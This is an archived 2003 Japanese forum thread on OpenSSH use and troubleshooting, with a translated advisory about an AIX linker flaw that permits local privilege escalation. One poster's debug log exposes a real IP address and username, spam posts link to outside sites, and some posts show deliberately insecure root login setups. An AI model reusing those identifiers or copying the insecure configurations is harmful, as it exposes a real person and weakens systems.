今更かもしれないけれど,周りにgpg使っていない人も多いので多少は
意味があると思って書いておきます。



750 名前:742 メール:sage 投稿日:03/04/10 16:35
gpgのインストール
さすがにこれは省略

自分用の私有鍵と公開鍵の作成
$ gpg --gen-key

基本的にデフォルトの設定で進む

パスフレーズなどを入力すると,~/.gnupg/ 以下に鍵などができる

$ gpg --list-keys
で確認

鍵のインポート
$ gpg --import DJM-GPG-KEY.asc
教えていただいた鍵を登録

$ gpg --list-keys
で確認

登録した鍵を,信用するために,自分の鍵で署名
$ gpg --lsign-key djm@mindrot.org

どれくらい信用するか聞かれるが,適当に答える。デフォルトでもよし。
本当はきちんと検証する必要がある。

ようやく,署名の検証が可能
$ gpg --verify openssh-3.6.1p1.tar.gz.sig

問題なければ終了。


751 名前:714 メール:sage 投稿日:03/04/11 12:55
sshdをkillしてssl,sshともにアップデートしましたがセッション切れずに
できました。
text file busyとかにもならないんだなぁ…もっと勉強しよう

752 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/11 20:49
>751
> text file busyとかにもならないんだなぁ

OS によってはなる

753 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/11 21:55
リモートにファイルを転送してそれを実行みたいなことをやりたいんだけど、
認証を一回で済まして、スクリプトで実行するには
どんな方法がありますか?

ssh-agentでパス打ち込むの一回だけとかって意味じゃなくて、
本当に認証を一回ですませたいんだけれど。
scpとかsftpで一度認証してるのに
sshで入りなおしてもう一度認証っていうのがアレなので。

754 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/11 23:29
>753
uuencode したものを流しこんで uudecode して実行するとか

755 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/11 23:42
ssh remote cat ">" script.tmp ";" sh script.tmp ";" rm script.tmp < my-script

756 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/12 00:02
>753
cat スクリプト | ssh REMOTE sh
とかじゃダメ?

バイナリファイルが実行したい場合は、754のように、
uuencodeした物をヒアドキュメントで埋め込んだスクリプトを作るとか。






757 名前:753 メール:sage 投稿日:03/04/13 00:26
>>754>>755>>756
なるほど、いろいろやり方があるんだなぁ。
いろいろ試してみようと思います。どうもありがとうございましたー

758 名前:山崎渉 メール:(^^) 投稿日:03/04/17 11:56
(^^)

759 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/17 22:34
すみません。教えてください。
ssh HOST "command"
とやるとき、シェル(デフォルトシェル?)を介して
コマンドを実行するんでしょうか、
それともシェルを介さずにコマンドが実行されるんでしょうか?

760 名前:名無しさん@お腹いっぱい。 投稿日:03/04/17 23:59
sshでログインできません。
自分の家の中のLAN内では問題なくできるのですが、
知人の家のマシンからログインさせたいのですが、できないのです。
とりあえずiptablesとかTCPラッパーは無効にしてます。
ルーターのバーチャルコンピュータの設定で転送先IPアドレスを
そのsshdが入ってるホストにしてます。クライアントはwinでputtyで鍵を生成しました。
その鍵をつかってLAN内からはアクセスできてます。しかし、友人の家からアクセスして
もらうとできないんです。could not load private key fileとかでるんです。
誰かアドバイスお願いします

761 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/18 00:57
>>759
ssh HOST ps auxw とかすれば分かるでしょ。
ps のオプションは違うかもしれんが。。。

762 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/18 08:53
putty って、鍵だけを別のマシンにもっていっても使えなかった
気がする。
友人のマシンで鍵を生成して、公開鍵をサーバ側に持っていったら
どうなる?

あ、その前に、公開鍵認証でなく、login pass でアクセスできるか
確認しておいた方がよいかも。

763 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/18 14:09
>>761
微妙だな。

sshd を ktrace とか strace 付きで動かしておいて出力を検分とかのほうが
確実か…

764 名前:759 メール:sage 投稿日:03/04/18 16:12
>>761>>763
わかりました。どうもありがとうございました。

765 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/18 21:11
>760
「友人の家」でも PuTTY を使っているのか?

違う実装、例えば OpenSSH とは鍵の互換性は無いよ。
変換は可能だが。

766 名前:760 メール:sage 投稿日:03/04/19 00:50
>>765 >>762
返事ありがとう。
とりあえず、puttygenだけ相手に渡して、向こうで鍵をつくってもらいました。
それで公開鍵をサーバーに置いたけど、アクセスできない・・・
友人がつくった鍵をもらって、自分の家のLAN内からアクセスするとやっぱり
接続できる。次にPasswordAuthentication yesに設定してパスワードで
ログインさせようとするもできませんでした。以下がエラーメッセージです。

login as: hogehoge
Sent username "hogehoge"
Trying public key authentication.
No passphrase required.
Couldn't load private key from C:\putty\id_rsa_hoge.

パスワード認証しようとすると

hogehoge@xxx.yyy.aaa.aa's password:
Access denied

となるのです。


767 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/19 01:08
>766
アドレスでアクセス制限でもしてるんじゃないの?

768 名前:760 メール:sage 投稿日:03/04/19 01:12
>>767
それはsshd.configの中でできるのですか?
特にそういうことはしてないのですが。
ほかにどういう可能性がかんがえられるのでしょう?
ちなみにtelnet,ftp,等は接続できてますので、
やはりsshの問題と考えているのですが

769 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/19 01:28
>>768
デバッグモードで問題の絞り込みぐらい城

くれぐれも、デバッグモードってどうやるの、とか聞くなよ

770 名前:760 メール:sage 投稿日:03/04/19 01:37
>>769
う・・・
わからないです。
調べます

771 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/19 08:39
>>770(=>>760
とりあえず、
   http://www.unixuser.org/~euske/doc/openssh/jman/
嫁!sshd(8)の -d オプションがそれ。「またサーバは fork せず、1回の接続しか
受けつけません。」ということなんで注意!
   [server]# sshd -ddd

772 名前:山崎渉 メール:(^^)sage 投稿日:03/04/20 05:51
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

773 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/22 13:55
#KerberosAuthentication no
#PermitUserEnvironment no

sshd_config(5)によればどちらも「デフォルトは``no''」と書いてあるのに
コメント外したらsshdが起動しないのはなぜ?

774 名前:名無しさん@XEmacs メール:sage 投稿日:03/04/22 15:06
>>773
> コメント外したらsshdが起動しないのはなぜ?

--with-kerberosX 辺りを付けて configure してないと、この option
項目の存在そのものがなかったものとして扱われるため。

> #PermitUserEnvironment no

だけなら起動するのでは?


775 名前:名無しさん@お腹いっぱい。 投稿日:03/04/24 09:08
すいません。教えてくださいです。
環境は
redhat 8.0
ADSL-acca12M
です。
ハブを使って二台のパソコンを配線しています。

winXPパソコンからttsshを使ってLinuxのパソコンにログインしようとすると、
しばらして、「Cannot connect the host」とエラーが出るんです。
Linux側でSSHは起動しています。
初心者ですが、よろしくお願いします。

776 名前:名無しさん@お腹いっぱい。 投稿日:03/04/24 09:10
>>775です。
ごめんなさい。ここUNIX版でした。
Linux版に移ります。

777 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/24 09:27
>>776
かまわんと思うが。

778 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/24 09:52
それだけじゃわからん。ssh -v した結果はってよ。

779 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/24 19:27
>>775
hosts.allow にssh を許可するIP アドレスが無いんじゃないですかねえ

780 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/24 19:29
あ、redhat 8.0 だったらxinetd の方かもしんないです。スレ汚しスマソ

781 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/24 20:13
>>780
RedHatではsshdの起動にwrapperの類いは使ってないのであります。

たぶん/usr/sbin/lokkitでsshのポートを開けると繋がるんじゃないかなあ。
デフォではwell knownなポートは全部rejectするようになってたと思う。


782 名前:ありがとうございます!! 投稿日:03/04/25 10:02
>>775です。
みなさんありがとうございます!!
lokkitでsshのポートを開けたらログインできました!
お騒がせしました!!(泣!!)

783 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/27 01:23
会社のRedHat8に自宅のOpenBSDのsshd_config突っ込んだら動かなくなった。
しかもリモートから。明日会社に行ったら怒られるんだろうなぁ。

784 名前:初期不良 メール:sage 投稿日:03/04/27 03:27
OpenBSD って事は portable かそうでないかって言う違い?
それとも RedHat8.0 標準が OpenSSH_3.4p1 だから?

785 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/27 12:57
kerberos

786 名前:783 メール:sage 投稿日:03/04/27 19:35
kerberos関連とUsePrivilegeSeparationとCompression削除で解決。
UsePrivilegeSeparation使えないと気持ち悪いが、まぁいいか。

787 名前:名無しさん@お腹いっぱい。 メール:age 投稿日:03/04/30 01:01
3.6.1p2 age

788 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/30 21:43
3.6.1p2公開のアナウンスメール:
http://www.mindrot.org/pipermail/openssh-unix-announce/2003-April/000060.html

aixgcc.adv:
http://www.mindrot.org/pipermail/openssh-unix-announce/2003-April/000061.html


>>787
乙!

789 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/30 21:55
「3.6.1p2公開のアナウンスメール」(URLは>>788参照)の日本語訳書いときます
(ただし"Changes since OpenSSH 3.6.1p1"の部分だけ)

3.6.1p1からの変更内容
============================

* SECURITY: AIX/gccでのリンク時の問題を修正。AIXユーザは直ちにアップグレー
 ドすることが推奨される。詳しくは別のアドバイザリ(aixgcc.adv)を参照のこと。
* Irixでのビルド時における問題を修正した。
* AFSサポート付きでビルドする際の問題を修正した。
* Openwall Linux から提供されたパッチのいくつかをマージした。

790 名前:名無しさん@お腹いっぱい。 メール:skel.(略) 投稿日:03/04/30 22:44
ちなみに、アナウンスメールにあるMD5チェックサムは openssh-3.6.1p2.tar.gz の
もののようです。(ファイル名が間違っている)

791 名前:名無しさん@お腹いっぱい。 メール:skel.(略) 投稿日:03/04/30 22:46
aixgcc.adv(URLは>>788参照)の日本語訳:

1. 影響を受けるシステム

  3.6.1p2よりも前の移植版OpenSSHをAIX上で使用しているユーザは、その
  OpenSSHがAIXのものでないコンパイラ(例えばgcc)でコンパイルされたもの
  である場合、この影響を受けます。

  ただし、IBMから提供されているOpenSSHのパッケージはこの影響は受けないこ
  とに注意して下さい。


792 名前:791 メール:sage 投稿日:03/04/30 22:48
2. Description

  AIXのランタイムリンカは、デフォルトでは、ダイナミックライブラリを、シス
  テムで規定されているパスから探す前にカレントディレクトリから探そうとし
  ます。これは実行ファイルがset[ug]idされているかどうかにかかわらず行わ
  れます。

  この振る舞いは安全でないばかりでなく、極めて危険なことです。攻撃者は
  ライブラリをすげ替えることによってより高い権限をローカルで搾取すること
  ができてしまいます。

  移植版OpenSSHはこのふざけた仕様に対処するための部分をconfigureスクリ
  プトに含めていますが、それはあくまでAIX純正のコンパイラでのみ有効と
  なっています。デフォルトの危険なAIXの振る舞いを変えていない場合、gccは
  AIX純正のコンパイラとは異なるコマンドラインオプションを指定する必要が
  あります。

793 名前:791 メール:sage 投稿日:03/04/30 23:07
3. 受ける影響

  ローカルユーザが不正に高い権限を搾取することができてしまいます。

4. 短期的な回避方法

  インストールされたバイナリからすべてのset[ug]idを取り除くことです。その
  バイナリは、たいていは 'ssh-agent' と 'ssh-keysign' ですが、古いバー
  ジョンでは 'ssh' も setuid されているかもしれません。

  ただし、ssh-keysignからsetuidを取り除くことでHostbased認証ができなく
  なることに注意して下さい。

  移植版OpenSSH 3.6.1p2 では、危険なリンカの振る舞いを避けるために、正し
  いオプションを使うようにしております。

794 名前:791 メール:sage 投稿日:03/04/30 23:17
5. 解決策

  この問題を解決するためには、AIXのリンカが、デフォルトでシステムで規定
  されているパスのみから(ダイナミックライブラリを)探し、かつset[ug]idされ
  たバイナリに関してはカレントディレクトリやユーザが指定したディレクトリ
  を決して探さないように変更しなければならない。

  我々はこれを、IBMのリンカに含まれている深刻な欠陥であると考えており、
  IBM側にこれを直ちに修正するよう主張する。IBMのヤシども、聞いてるかぃ?

795 名前:791 メール:sage 投稿日:03/04/30 23:19
6. Credits
は省略。

おしまい。
間違いとかあったら指摘よろしくです。


# >>793はコピペ荒らしなんで削除依頼出しときます。

796 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/30 23:31
1.にある「IBMから提供されているOpenSSHのパッケージ」のURLは
   ttp://oss.software.ibm.com/developerworks/projects/opensshi
な。追記忘れとる。。

797 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/30 23:31
>>795
># >>793はコピペ荒らしなんで削除依頼出しときます。
削除した為現在は存在しません。
出来れば荒らしにはレスを付けずにご依頼をお願いいたします。

798 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/04/30 23:33
>>797
あれ、「あぼーん」だけになるんじゃないのか。。。

799 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/01 00:44
>>798
申し訳ありません。通常削除するべきところを誤って透明削除してしまいました。


800 名前:名無しさん@お腹いっぱい。 メール:sag 投稿日:03/05/05 09:50
ttp://triaez.kaisei.org/~kaoru/diary/?200305a#200305045
GlobalKnownHostsFile をこんなふうにつかってるヤシいるのか


801 名前:名無しさん@お腹いっぱい。 投稿日:03/05/08 13:43
unixクライアント SSH1 から debian のサーバ openSSH1 に ssh したいのですが、
うまくいきません。
クライアント側で ssh-keygen1 して、public key をサーバの ~/.ssh/authorized_keys に
はりつけるだけですよね?
ssh -v したところ、以下のようなエラーでした。


802 名前:名無しさん@お腹いっぱい。 投稿日:03/05/08 13:45
********************************************************
debug: SshAppCommon/sshappcommon.c:133/ssh_app_get_global_regex_context: Allocating global SshRegex context.
debug: SshConfig/sshconfig.c:2232/ssh2_parse_config: Unable to open /home/yamamot9/.ssh2/ssh2_config
debug: Connecting to kuma, port 22... (SOCKS not used)
debug: Ssh2/ssh2.c:1977/main: Entering event loop.
debug: Ssh2Client/sshclient.c:1403/ssh_client_wrap: Creating transport protocol.
debug: SshAuthMethodClient/sshauthmethodc.c:85/ssh_client_authentication_initialize: Added "hostbased" to usable methods.
debug: SshAuthMethodClient/sshauthmethodc.c:85/ssh_client_authentication_initialize: Added "publickey" to usable methods.
debug: Ssh2Client/sshclient.c:1444/ssh_client_wrap: Creating userauth protocol.
debug: client supports 2 auth methods: 'hostbased,publickey'
debug: Ssh2Common/sshcommon.c:560/ssh_common_wrap: local ip = 131.112.51.200, local port = 51121
debug: Ssh2Common/sshcommon.c:562/ssh_common_wrap: remote ip = 192.168.4.128, remote port = 22
debug: SshConnection/sshconn.c:1930/ssh_conn_wrap: Wrapping...
debug: Remote version: SSH-2.0-OpenSSH_3.4p1 Debian 1:3.4p1-1
debug: Ssh2Transport/trcommon.c:1306/ssh_tr_input_version: Remote version has rekey incompatibility bug.
debug: Ssh2Transport/trcommon.c:1309/ssh_tr_input_version: Remote version is OpenSSH, KEX guesses disabled.
debug: Ssh2Transport/trcommon.c:1648/ssh_tr_negotiate: lang s to c: `', lang c to s: `'


803 名前:名無しさん@お腹いっぱい。 投稿日:03/05/08 13:45
debug: Ssh2Transport/trcommon.c:1714/ssh_tr_negotiate: c_to_s: cipher aes128-cbc, mac hmac-sha1, compression none
debug: Ssh2Transport/trcommon.c:1717/ssh_tr_negotiate: s_to_c: cipher aes128-cbc, mac hmac-sha1, compression none
debug: Remote host key found from database.
debug: Ssh2Common/sshcommon.c:318/ssh_common_special: Received SSH_CROSS_STARTUP packet from connection protocol.
debug: Ssh2Common/sshcommon.c:368/ssh_common_special: Received SSH_CROSS_ALGORITHMS packet from connection protocol.
debug: server offers auth methods 'publickey,password,keyboard-interactive'.
debug: Ssh2AuthPubKeyClient/authc-pubkey.c:1536/ssh_client_auth_pubkey_add_file_keys: adding keyfile "/home/yamamot9/.ssh2/id_dsa_1024_grandma" to candidates
debug: server offers auth methods 'publickey,password,keyboard-interactive'.
debug: Ssh2AuthClient/sshauthc.c:316/ssh_authc_completion_proc: Method 'publickey' disabled.
debug: server offers auth methods 'publickey,password,keyboard-interactive'.
debug: Ssh2Common/sshcommon.c:155/ssh_common_disconnect: DISCONNECT received: No further authentication methods available.
warning: Authentication failed.
debug: Ssh2/ssh2.c:127/client_disconnect: locally_generated = TRUE
Disconnected; no more authentication methods available (No further authentication methods available.).
debug: Ssh2Client/sshclient.c:1478/ssh_client_destroy: Destroying client.
debug: SshConnection/sshconn.c:1982/ssh_conn_destroy: Destroying SshConn object.
debug: Ssh2Client/sshclient.c:1540/ssh_client_destroy_finalize: Destroying client completed.
debug: SshAuthMethodClient/sshauthmethodc.c:89/ssh_client_authentication_uninitialize: Destroying authentication method array.
debug: SshAppCommon/sshappcommon.c:146/ssh_app_free_global_regex_context: Freeing global SshRegex context.
**************************************************************


804 名前:名無しさん@お腹いっぱい。 投稿日:03/05/08 13:46
debug: Ssh2Common/sshcommon.c:155/ssh_common_disconnect: DISCONNECT received: No further authentication methods available.
warning: Authentication failed.

のあたりだと思うので、調べてみたのですが、よくわかりません。
ちなみに ssh2 から openSSH2 では ssh ログインできているのですが、
必要ができて ssh から openSSH へとログインしたい状態です。

よろしくお願いします。


805 名前:名無しさん@お腹いっぱい。 投稿日:03/05/08 20:52
大学、学科、名字までわかるログだな。

806 名前:動画直リン 投稿日:03/05/08 21:14
http://homepage.mac.com/hitomi18/

807 名前:名無しさん@お腹いっぱい。 投稿日:03/05/08 22:15
debug: Ssh2Common/sshcommon.c:560/ssh_common_wrap: local ip = 131.112.51.200, local port = 51121
(;´Д`)/lァ/lァ

808 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/08 22:16
設定ファイルも晒した方がいいかもな

809 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/08 22:31
>801
「unixクライアント SSH1」 とは ssh.com の ssh のことか?
OpenSSH の鍵とはフォーマットが違うが、変換はしたのか?

モロ出しハァハァ

810 名前:名無しさん@XEmacs メール:sage 投稿日:03/05/08 22:54
>>801
> unixクライアント SSH1 から debian のサーバ openSSH1 に ssh したいのですが、
> うまくいきません。

そりゃ、そのでぶの Protocol が

>>802
> debug: Remote version: SSH-2.0-OpenSSH_3.4p1 Debian 1:3.4p1-1

の通り version2 のみの設定になってるからだろう。SSH1 で繋げるた
めにはここが SSH-1.99-… となってなきゃあかん。

でぶの sshd_config の設定を見直せば治る。


811 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/08 23:02
>>809
openssh は最初から ssh1 も ssh2 も両方話せますよ、一応。

812 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/08 23:04
>>808
IP アドレスがばれている以上、晒すのは危険かも....

813 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/08 23:05
ssh -1
しとけばって話?

814 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/08 23:15
あ、漏れと同じ大学・・・。

815 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/09 09:11
ホストAにポートフォワーディングして
ssh -fNR 5910:localhost:5900 hostA
hostBから
vncviewer hostA:10
とやってもつながりません。
hostAから
vncviewer localhost:10
はつながります。
-Lでポートフォワーディングしてるときは-gをつければ同じようなことができたのですが、
-Rのときは-gをつけてもできません。どうすればいいですか

816 名前:名無しさん@XEmacs メール:sage 投稿日:03/05/09 12:50
>>815
> -Lでポートフォワーディングしてるときは-gをつければ同じようなことができたのですが、
> -Rのときは-gをつけてもできません。どうすればいいですか

そりゃ client の指図でそんなことされちゃったら server も大変だ
ろう。

sshd_config の man page をよく読むよろし。


817 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/09 21:14
Redhat7.3でssh使ってるんですが、
ssh_exchange_identification: Connection closed by remote host
が出てアクセス出来ないというのはどのような原因が考えられますか?

以下が詳細です。
server: 192.168.0.3 client(w2k): 192.168.30.15と仮定します。
hosts.allowにはsshd : 192.168.30.15
hosts.denyにはALL : ALLと記述しています。
xinetd経由ではないのですが、sshdはhostsを読むという話を聞いたのでそうしています。
この状態でclient⇒Serverで上記のエラーを吐きます。
明日はhosts.allowにALL : 192.168.30.15と記述して試す予定ですが、
他にここもいじった方がいいというところがあればご指導お願いします。

818 名前:815 メール:sage 投稿日:03/05/09 22:27
>>816
そうですか。リモートのことですからね。ありがとうございました。

819 名前:名無しさん@お腹いっぱい。 投稿日:03/05/09 23:28
          ☆ チン     マチクタビレタ〜
                         マチクタビレタ〜
        ☆ チン  〃  Λ_Λ   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
          ヽ ___\(\・∀・) < テポドン2まーだー?
             \_/⊂ ⊂_ )   \_____________
           / ̄ ̄ ̄ ̄ ̄ ̄ /|
        | ̄ ̄ ̄ ̄ ̄ ̄ ̄|  |
        | .愛媛みかん.  |/

820 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/09 23:29
うごっ、誤爆スマソ・・・吊ってきまつ

821 名前:名無しさん@XEmacs メール:sage 投稿日:03/05/10 08:34
>>817
> Redhat7.3でssh使ってるんですが、
> ssh_exchange_identification: Connection closed by remote host
> が出てアクセス出来ないというのはどのような原因が考えられますか?

現象的には相手の identification_string (SSH-2.0-OpenSSH… とか
いうヤツ) を読んでる最中に \n が来る前に先方が接続を閉じちゃっ
たときに出るメッセージ。なので原因は分からんけど、

> hosts.allowにはsshd : 192.168.30.15
> hosts.denyにはALL : ALLと記述しています。

には関係なさそう (ここに来るのは hosts.* のチェック後)。

server/client の version を曝せばもう少し分かる (人がいる) かも。

> xinetd経由ではないのですが、sshdはhostsを読むという話を聞いたのでそうしています。

それは configure 次第。


822 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/17 15:00
でぶでapt-getしていれたばあい sshd_configは
Protocol 2

てなってるはず。

Protocal 2,1
にしてもよいけどいまさらプロトコル1つーのもナンセンスだと思う

823 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/17 20:07
>>822
TTSSH使っているユーザのために必要ってこともあろう。まぁそれでもPuTTY使え
っつーことになるんだろうけどな

824 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/18 10:08
2199年: sshd のセキュリティホールが利用される
http://www.securityfocus.com/news/4831
http://lists.insecure.org/lists/nmap-hackers/2003/Apr-Jun/0010.html

825 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/18 10:10
犯行現場を忘れておった
http://images.insecure.org/nmap/images/matrix/

826 名前:三村マサカズ@さまぁ〜ず メール:sage 投稿日:03/05/18 10:43
2199年なのにアドレスがまだ IPv4 かよっ!

827 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/18 15:19
>>826
IP のバージョンと URL の表記に関連でも?

828 名前:824 メール:sage 投稿日:03/05/18 16:00
う、実はよく知らないのにネタにしてスマソ。
>>825のあちこちに出てくる「10.2.2.2」っていうのが
v4のIPアドレスだと思ったのよ。違うの?

829 名前:826=828 メール:sage 投稿日:03/05/18 16:02
826=828だけど824やなかった。カコワルイ&ゴメソ。

830 名前:初期不良 メール:sage 投稿日:03/05/18 17:15
SSHv1 は使うなって事か...
>>826
プライベートアドレスだし IPv4 でもいいんじゃない?

831 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/18 17:18
>>830
> SSHv1 は使うなって事か...
いや、単に既知の穴が使われただけなんでそうとも言えない。

832 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/18 17:31
まだ見ていないからわからんが、 /. では年代を錯覚させている場面だから、
IPv4でよい、みたいなことを言っていたような。

833 名前:名無しさん@お腹いっぱい。 投稿日:03/05/18 17:32
winscp2を使って、ssh2 rsa認証にてサーバーに接続していますが、
自分のホームディレクトリより上の階層が見えてしまいます。
皆さんはどのような対策をとっておられますか?
opensshにパッチを当ててインストールしなおして設定をいじれば良いようですが
opensshがアップデートされるとまた変更しなければならないようで
もっと良い方法をご存知の方教えていただけませんか?お願いします。

834 名前:名無しさん@お腹いっぱい。 投稿日:03/05/18 19:32
SSH1がマズイ理由ってのが
どう検索しても見つからない。

835 名前:名無しさん@お腹いっぱい。 投稿日:03/05/18 19:59
他のディレクトリ見えます。

836 名前:名無しさん@Emacs メール:sage 投稿日:03/05/18 20:01
>>834
まさか、検索キーワードが "SSH1" "マズイ"じゃないだろーな?

http://www.kb.cert.org/vuls/id/161576

837 名前:名無しさん@お腹いっぱい。 投稿日:03/05/18 20:07
>>833
他のディレクトリが見えないようにするにはどうすれば良いですか?

838 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/18 20:42
>>836
マズイ のほかにも検索キーワードつけたけど
おかしい 穴 セキュリティ
どれやってもダメだった

839 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/18 20:58
>>838
> ssh-1 欠陥


840 名前:名無しさん@お腹いっぱい。 投稿日:03/05/18 21:48
他のディレクトリが見えないようにするにはどうすれば良いですか?


841 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/18 21:56
>>833
>>840
jailすれば?


842 名前:名無しさん@お腹いっぱい。 投稿日:03/05/18 22:15
jail調べてみます。

843 名前:名無しさん@Emacs メール:sage 投稿日:03/05/19 01:04
>>838
> マズイ のほかにも検索キーワードつけたけど

ふつーは、ssh exploit とか ssh vulnerability
ではないかと思われ。結果的には英語を見ることになるが

844 名前:ワカンネ 投稿日:03/05/19 01:36
sshでパスワードなしでログインしようと考えています。とりあえずセキュリティは無視してrootで行います。
ホストAとホストBでお互いに一度sshでログインした後

ホストA-------------------------------------------------
#ssh -V
OpenSSH_3.1p1, SSH protocols 1.5/2.0, OpenSSL 0x0090602f

#cat /etc/ssh/ssh_config
HostbasedAuthentication yes
PreferredAuthentications hostbased,publickey,password

# ls -l /usr/bin/ssh
-r-sr-xr-x 1 root root 219932 4月 5 2002 /usr/bin/ssh

ホストB-------------------------------------------------
# ssh -V
OpenSSH_3.1p1, SSH protocols 1.5/2.0, OpenSSL 0x0090602f

# cat /etc/ssh/sshd_config
RhostsAuthentication no
IgnoreRhosts no
RhostsRSAAuthentication yes
HostbasedAuthentication yes
Subsystem sftp /usr/libexec/openssh/sftp-server

# cat /root/.shosts
ホストA root
--------------------------------------------------------
この状態でホストAからホストBに
# ssh root@ホストB
としてもパスワードを聞かれてしまいます。どこか設定がおかしいのでしょうか?
何か基本的なところを見落としているような気がするのですが・・・

845 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/19 02:06
>>843
> ふつーは、ssh exploit とか ssh vulnerability
> ではないかと思われ。結果的には英語を見ることになるが
しかしそれらは ssh protocol version 1 自体の欠陥ではないよね。

846 名前:((≡゜♀゜≡)) 投稿日:03/05/19 03:56
セクシーだよ
http://homepage3.nifty.com/coco-nut/

847 名前:822 メール:sage 投稿日:03/05/19 06:33
>833

漏れはFreeBSD使ってるため

http://nadmin.org/howto/chrooted-ssh.html
ここのパッチを流用して3.6.1p2をchroot利用可能にした。

>opensshがアップデートされるとまた変更しなければならないようで
なら
scponlyとかいうのがよいかも
http://www.sublimation.org/scponly/

あとは自分で調べてくれい

848 名前:うひひ メール:sage 投稿日:03/05/19 10:27
こないだ友達の家にSSHのロゴが入った鏡があった
50mm丸くらいでカドがウマクモニタとかに付くような凸面鏡
なんでもSSH社ではソーシャルハックも含めsshに鏡を合わせれば
最強であるというジョークから生まれたらしいが
販促だか商品だかは良く聞かなかった

セキュリティ関係会社からTからイエローまで切れるロゴ入りハサミが
出ることを祈ってsage



849 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/19 10:33
イエローを切れるハサミってどんなんだ。
裁縫バサミじゃおっつかなさそうだな。


850 名前:名無しさん@XEmacs メール:sage 投稿日:03/05/19 12:34
>>844
> # ssh root@ホストB
> としてもパスワードを聞かれてしまいます。どこか設定がおかしいのでしょうか?

これだけの情報でわかるか、という挑戦かい?sshd の log にはなん
にも出てないのかな?

これだけからとりあえず思い付く可能性としては:

・.shosts 中のホストA の記載が FQDN じゃない
・root の home directry が /root じゃない
・.shosts の access permission が不正
・ホストB に Protocol 2 用の鍵がないため、Protocol 1 で繋ごうと
 しちゃっている

くらいか。


851 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/19 13:00
高枝切りバサミ

852 名前:844 投稿日:03/05/19 22:12
>>850
マヂですんません。無事繋がりました。
・ホストB に Protocol 2 用の鍵がないため、Protocol 1 で繋ごうと
 しちゃっている
でした。今後質問するときも気を付けます。
ありがとうございました。

853 名前:名無しさん@XEmacs メール:sage 投稿日:03/05/20 12:39
>>852
> マヂですんません。無事繋がりました。
> ・ホストB に Protocol 2 用の鍵がないため、Protocol 1 で繋ごうと
>  しちゃっている
> でした。

あらま、それが当たりかい。いちばんありそうもないケースだろーと
思てたのに。

>今後質問するときも気を付けます。

今回のケースなら ssh -v の結果が貼り付けてあれば一目瞭然だった
でしょうからね。

ま、ここにあんまり長いの貼り付けるのもなにかもなので、春山さん
とこの SSH ML と使い分けるのがいいかも。


854 名前:山崎渉 メール:(^^) 投稿日:03/05/22 01:51
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

855 名前:名無しさん@お腹いっぱい。 投稿日:03/05/22 02:34
山崎対策age



856 名前:名無しさん@お腹いっぱい。 メール:age 投稿日:03/05/25 15:47
MATRIX RELOADED出演age

857 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/26 20:54
>>856
どこ?

858 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/26 21:03
>>856-857
>824-で激しく外出だよ〜ん♪


859 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/26 21:09
http://images.insecure.org/nmap/images/matrix/
某MLに出てたのでsage

860 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/26 21:57
>>859
>>825 が見えませんか。

861 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/05/26 22:09
>>860
見えませんが何か?

